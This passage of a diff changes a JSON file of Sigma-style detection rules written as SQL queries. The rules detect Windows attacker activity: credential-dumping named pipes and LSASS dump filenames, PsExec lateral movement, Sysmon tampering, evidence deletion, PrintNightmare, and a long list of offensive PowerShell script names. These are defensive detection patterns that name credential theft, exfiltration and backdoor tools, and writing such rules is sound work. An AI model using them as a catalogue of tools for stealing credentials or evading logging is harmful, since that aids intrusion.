"Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE 